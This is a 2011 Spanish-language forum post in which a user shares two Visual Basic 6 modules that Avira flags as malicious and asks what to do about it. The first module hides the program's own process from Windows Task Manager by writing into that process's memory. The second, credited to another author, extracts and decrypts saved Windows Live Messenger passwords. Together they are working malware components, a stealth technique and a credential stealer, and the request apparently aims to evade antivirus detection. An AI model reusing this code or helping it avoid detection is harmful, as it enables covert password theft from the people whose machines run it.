Codigo 'virico'

Iniciado por CAR3S?, 25 Abril 2011, 21:55 PM

0 Miembros y 1 Visitante están viendo este tema.

CAR3S?

Holaaaaas   :P

:3

el avira me detecta 2 modulos como viricos,

este es para ocultar el proceso del admin de tareas

Código (vb) [Seleccionar]


Option Explicit
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function EnumChildWindows Lib "user32" (ByVal hWndParent As Long, ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long
Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Public Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long
Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long

Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long

Public Declare Function SetTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long) As Long
Public Declare Function KillTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent As Long) As Long

Const PROCESS_VM_OPERATION = &H8
Const PROCESS_VM_READ = &H10
Const PROCESS_VM_WRITE = &H20
Const PROCESS_ALL_ACCESS = 0
Private Const PAGE_READWRITE = &H4&

Const MEM_COMMIT = &H1000
Const MEM_RESERVE = &H2000
Const MEM_DECOMMIT = &H4000
Const MEM_RELEASE = &H8000
Const MEM_FREE = &H10000
Const MEM_PRIVATE = &H20000
Const MEM_MAPPED = &H40000
Const MEM_TOP_DOWN = &H100000

Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function VirtualFreeEx Lib "kernel32" (ByVal hProcess As Long, lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Private Const LVM_FIRST = &H1000
Private Const LVM_GETTITEMCOUNT& = (LVM_FIRST + 4)

Private Const LVM_GETITEMW = (LVM_FIRST + 75)
Private Const LVIF_TEXT = &H1
Private Const LVM_DELETEITEM = 4104

Public Type LV_ITEM
mask As Long
iItem As Long
iSubItem As Long
State As Long
stateMask As Long
lpszText As Long 'LPCSTR
cchTextMax As Long
iImage As Long
lParam As Long
iIndent As Long
End Type

Type LV_TEXT
sItemText As String * 80
End Type

Public Function Procesos(ByVal hWnd2 As Long, lParam As String) As Boolean
Dim Nombre As String * 255, nombreClase As String * 255
Dim Nombre2 As String, nombreClase2 As String
Dim X As Long, Y As Long
X = GetWindowText(hWnd2, Nombre, 255)
Y = GetClassName(hWnd2, nombreClase, 255)

Nombre = Left(Nombre, X)
nombreClase = Left(nombreClase, Y)
Nombre2 = Trim(Nombre)
nombreClase2 = Trim(nombreClase)
If nombreClase2 = "SysListView32" And Nombre2 = "Procesos" Then
OcultarItems (hWnd2)
Exit Function
End If
If Nombre2 = "" And nombreClase2 = "" Then
Procesos = False
Else
Procesos = True
End If
End Function

Private Function OcultarItems(ByVal hListView As Long) ' As Variant
Dim pid As Long, tid As Long
Dim hProceso As Long, nElem As Long, lEscribiendo As Long, i As Long
Dim DirMemComp As Long, dwTam As Long
Dim DirMemComp2 As Long
Dim sLVItems() As String
Dim li As LV_ITEM
Dim lt As LV_TEXT
If hListView = 0 Then Exit Function
tid = GetWindowThreadProcessId(hListView, pid)
nElem = SendMessage(hListView, LVM_GETTITEMCOUNT, 0, 0&)
If nElem = 0 Then Exit Function
ReDim sLVItems(nElem - 1)
li.cchTextMax = 80
dwTam = Len(li)
DirMemComp = GetMemComp(pid, dwTam, hProceso)
DirMemComp2 = GetMemComp(pid, LenB(lt), hProceso)
For i = 0 To nElem - 1
li.lpszText = DirMemComp2
li.cchTextMax = 80
li.iItem = i
li.mask = LVIF_TEXT
WriteProcessMemory hProceso, ByVal DirMemComp, li, dwTam, lEscribiendo
lt.sItemText = Space(80)
WriteProcessMemory hProceso, ByVal DirMemComp2, lt, LenB(lt), lEscribiendo
Call SendMessage(hListView, LVM_GETITEMW, 0, ByVal DirMemComp)
Call ReadProcessMemory(hProceso, ByVal DirMemComp2, lt, LenB(lt), lEscribiendo)
If TrimNull(StrConv(lt.sItemText, vbFromUnicode)) = App.EXEName & ".exe" Then '<===========CAMBIAR
Call SendMessage(hListView, LVM_DELETEITEM, i, 0)
Exit Function
End If
Next i
CloseMemComp hProceso, DirMemComp, dwTam
CloseMemComp hProceso, DirMemComp2, LenB(lt)
End Function

Private Function GetMemComp(ByVal pid As Long, ByVal memTam As Long, hProceso As Long) As Long
hProceso = OpenProcess(PROCESS_VM_OPERATION Or PROCESS_VM_READ Or PROCESS_VM_WRITE, False, pid)
GetMemComp = VirtualAllocEx(ByVal hProceso, ByVal 0&, ByVal memTam, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE)
End Function

Private Sub CloseMemComp(ByVal hProceso As Long, ByVal DirMem As Long, ByVal memTam As Long)
Call VirtualFreeEx(hProceso, ByVal DirMem, memTam, MEM_RELEASE)
CloseHandle hProceso
End Sub
Private Function TrimNull(sInput As String) As String
Dim pos As Integer
pos = InStr(sInput, Chr$(0))
If pos Then
TrimNull = Left$(sInput, pos - 1)
Exit Function
End If
TrimNull = sInput
End Function
Sub TimerProc(ByVal hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long)
Dim Handle As Long
Handle = FindWindow(vbNullString, "Administrador de tareas de Windows")
If Handle <> 0 Then EnumChildWindows Handle, AddressOf Procesos, 1
End Sub

Public Sub Ocultar(ByVal hwnd As Long)
App.TaskVisible = False
SetTimer hwnd, 0, 20, AddressOf TimerProc
End Sub

Public Sub Mostrar(ByVal hwnd As Long)
App.TaskVisible = True
KillTimer hwnd, 0
End Sub


y este es para obtener las contraseñas del msn guardadas

Código (vb) [Seleccionar]


Option Explicit

'---------------------------------------------------------------------------------------
' Module      : mMessengerPass
' DateTime    : 23/09/2008 11:24
' Author      : Cobein
' Mail        : cobein27@hotmail.com
' WebPage     : http://www.advance.com.ar
' Purpose     : Read WLM (>= 8.0) pass
' Usage       : At your own risk
' Requirements: None
' Distribution: You can freely use this code in your own
'               applications, but you may not reproduce
'               or publish this code on any web site,
'               online service, or distribute as source
'               on any media without express permission.
'
' Reference   : No idea about the original author, It was a french guy tho
'
' History     : 23/09/2008 First Cut....................................................
'---------------------------------------------------------------------------------------


Private Declare Function LocalFree Lib "kernel32.dll" (ByVal hMem As Long) As Long
Private Declare Function LocalAlloc Lib "kernel32.dll" (ByVal wFlags As Long, ByVal wBytes As Long) As Long
Private Declare Sub CopyMemory Lib "kernel32.dll" Alias "RtlMoveMemory" (ByRef Destination As Any, ByRef Source As Any, ByVal Length As Long)
Private Declare Function CredEnumerate Lib "ADVAPI32.dll" Alias "CredEnumerateW" (ByVal lpszFilter As Long, ByVal lFlags As Long, ByRef pCount As Long, ByRef lppCredentials As Long) As Long
Private Declare Function CredFree Lib "ADVAPI32.dll" (ByVal pBuffer As Long) As Long
Private Declare Function CryptUnprotectData Lib "crypt32.dll" (ByRef pDataIn As DATA_BLOB, ByVal ppszDataDescr As Long, ByVal pOptionalEntropy As Long, ByVal pvReserved As Long, ByVal pPromptStruct As Long, ByVal dwFlags As Long, ByRef pDataOut As DATA_BLOB) As Long
Private Declare Function SysAllocString Lib "oleaut32.dll" (ByVal pOlechar As Long) As String
Private Declare Function GetVersionEx Lib "kernel32.dll" Alias "GetVersionExA" (ByRef lpVersionInformation As OSVERSIONINFO) As Long

Private Type CREDENTIAL
    dwFlags                 As Long
    dwType                  As Long
    lpstrTargetName         As Long
    lpstrComment            As Long
    ftLastWritten           As Double
    dwCredentialBlobSize    As Long
    lpbCredentialBlob       As Long
    dwPersist               As Long
    dwAttributeCount        As Long
    lpAttributes            As Long
    lpstrTargetAlias        As Long
    lpUserName              As Long
End Type

Private Type DATA_BLOB
    cbData                  As Long
    pbData                  As Long
End Type

Private Type OSVERSIONINFO
    dwOSVersionInfoSize     As Long
    dwMajorVersion          As Long
    dwMinorVersion          As Long
    dwBuildNumber           As Long
    dwPlatformId            As Long
    szCSDVersion            As String * 128
End Type

Public Function EnumWLMAccounts() As String
    Dim lMem        As Long
    Dim i           As Long
    Dim lCount      As Long
    Dim lCred       As Long
    Dim ub          As Long
    Dim lPtr        As Long
    Dim tCred       As CREDENTIAL
    Dim tBlobOut    As DATA_BLOB
    Dim tBlobIn     As DATA_BLOB
    Dim sPass       As String
    Dim vData       As Variant
    Dim tOSV        As OSVERSIONINFO
   
    With tOSV
        .dwOSVersionInfoSize = Len(tOSV)
        Call GetVersionEx(tOSV)
        If Not .dwMajorVersion + .dwMinorVersion / 10 >= 5.1 Then
            Exit Function
        End If
    End With
   
    lMem = LocalAlloc(&H40, 38)
   
    vData = Array( _
       &H57, &H69, &H6E, &H64, &H6F, &H77, &H73, &H4C, &H69, _
       &H76, &H65, &H3A, &H6E, &H61, &H6D, &H65, &H3D, &H2A)
   
    For i = 0 To 17
        Call CopyMemory(ByVal lMem + (i * 2), CLng(vData(i)), &H1)
    Next
   
    Call CredEnumerate(lMem, 0, lCount, lCred)
   
    If lCount Then
        For i = ub To ub + lCount - 1
       
            Call CopyMemory(ByVal VarPtr(lPtr), ByVal lCred + (i - ub) * 4, &H4)
            Call CopyMemory(ByVal VarPtr(tCred), ByVal lPtr, &H34)
   
            With tBlobIn
                .pbData = tCred.lpbCredentialBlob
                .cbData = tCred.dwCredentialBlobSize
           
                Call CryptUnprotectData(tBlobIn, 0&, 0&, 0&, 0&, 1&, tBlobOut)

                sPass = Space(.cbData \ 2)
                Call CopyMemory(ByVal StrPtr(sPass), ByVal .pbData, .cbData)
            End With
           
                       EnumWLMAccounts = EnumWLMAccounts & vbCrLf & vbCrLf & String(50, "-") & vbCrLf
            EnumWLMAccounts = EnumWLMAccounts & "Protocolo: " & StrConv(SysAllocString(tCred.lpstrTargetName), vbFromUnicode) & vbCrLf
            EnumWLMAccounts = EnumWLMAccounts & "Cuenta: " & StrConv(SysAllocString(tCred.lpUserName), vbFromUnicode) & vbCrLf
            EnumWLMAccounts = EnumWLMAccounts & "Contraseña: " & sPass & vbCrLf
            EnumWLMAccounts = EnumWLMAccounts & String(50, "-") & vbCrLf
         
        Next
        ub = ub + lCount
    End If
   
    Call CredFree(lCred)
    Call LocalFree(lMem)
End Function




la verdad nose que hay que hacer,

osea es como q estoy en el desierto sin brujula y tengo q ir al norte (en este desierto no hay sol xd) (?

que tengo que hacer?